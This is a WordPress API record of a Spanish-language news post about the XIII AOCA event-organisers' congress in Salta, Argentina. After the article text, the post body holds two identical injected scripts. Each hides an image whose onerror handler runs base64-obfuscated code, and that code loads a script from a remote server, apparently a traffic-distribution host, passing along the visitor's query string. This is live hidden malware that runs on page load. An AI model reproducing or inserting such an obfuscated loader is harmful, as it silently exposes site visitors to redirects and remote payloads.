{"id":1713,"date":"2022-11-02T14:28:42","date_gmt":"2022-11-02T17:28:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1713"},"modified":"2025-08-14T00:31:28","modified_gmt":"2025-08-14T03:31:28","slug":"el-encuentro-nacional-de-profesionales-de-la-organizacion-de-congresos-se-realizara-el-9-y-10-de-noviembre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1713","title":{"rendered":"El encuentro nacional de profesionales de la organizaci\u00f3n de Congresos se realizar\u00e1 el 9 y 10 de noviembre"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#574103\"><em>La provincia fue elegida sede por el trabajo que desarrolla en el \u00e1rea de organizaci\u00f3n de eventos y por la importante infraestructura tur\u00edstica.<\/em><\/h4>\n\n\n\n<p>En el&nbsp;<strong>Centro de Convenciones de Salta&nbsp;<\/strong>se realizar\u00e1 el mi\u00e9rcoles 9 y el jueves 10 de noviembre el XIII&nbsp;<strong>Congreso Argentino AOCA<\/strong>&nbsp;y el viernes 11 el XXXXIV Encuentro Nacional de Destinos Sede de Eventos. A la actividad, organizada por AOCA asistir\u00e1n alrededor de 400 emprendedores y referentes vinculados a la organizaci\u00f3n de eventos.<\/p>\n\n\n\n<p>La provincia fue elegida por el trabajo que desarrolla en el \u00e1rea de organizaci\u00f3n de eventos y por la importante infraestructura tur\u00edstica con que cuenta, la excelencia en servicios que presta a los visitantes y por la conectividad que facilita &nbsp;los viajes desde todo el pa\u00eds.<\/p>\n\n\n\n<p>El programa del Congreso ofrece una variada propuesta de exposiciones entre las que se destacan temas relacionados al futuro de la industria, la transformaci\u00f3n digital, el desarrollo sostenible, las posibles alianzas para el sector entre otros.&nbsp;<\/p>\n\n\n\n<p>Los interesados en participar pueden completar su inscripci\u00f3n online ingresando a: https:\/\/intercloudy.contilatam.com\/1847\/xiii-congreso-argentino-aoca.<\/p>\n\n\n\n<p>\u00abSomos uno de los destinos de reuniones m\u00e1s elegidos del pa\u00eds, es una actividad que est\u00e1 creciendo y genera desarrollo y empleo en sectores gastron\u00f3micos, en agencias de viajes, hoteler\u00eda y en muchos otros servicios. Esperamos que los emprendedores salte\u00f1os se sumen a estas jornadas\u00bb, dijo el ministro de Turismo y Deportes Mario Pe\u00f1a.<\/p>\n\n\n\n<p>En tanto, el XXXXIV Encuentro Nacional de Destinos Sede de Eventos ser\u00e1 el marco para la actualizaci\u00f3n y reuni\u00f3n de los sectores p\u00fablicos y privados de los destinos de todo el pa\u00eds.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-encuentro-nacional-de-profesionales-de-la-organizacion-de-congresos-se-realizara-el-9-y-10-de-noviembre-85857\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La provincia fue elegida sede por el trabajo que desarrolla en el \u00e1rea de organizaci\u00f3n de eventos y por la importante infraestructura tur\u00edstica. En el&nbsp;Centro de Convenciones de Salta&nbsp;se realizar\u00e1 el mi\u00e9rcoles 9 y el jueves 10 de noviembre el XIII&nbsp;Congreso Argentino AOCA&nbsp;y el viernes 11 el XXXXIV Encuentro Nacional de Destinos Sede de Eventos. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1714,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-1713","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1713"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1713"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1713\/revisions"}],"predecessor-version":[{"id":7293,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1713\/revisions\/7293"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1714"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}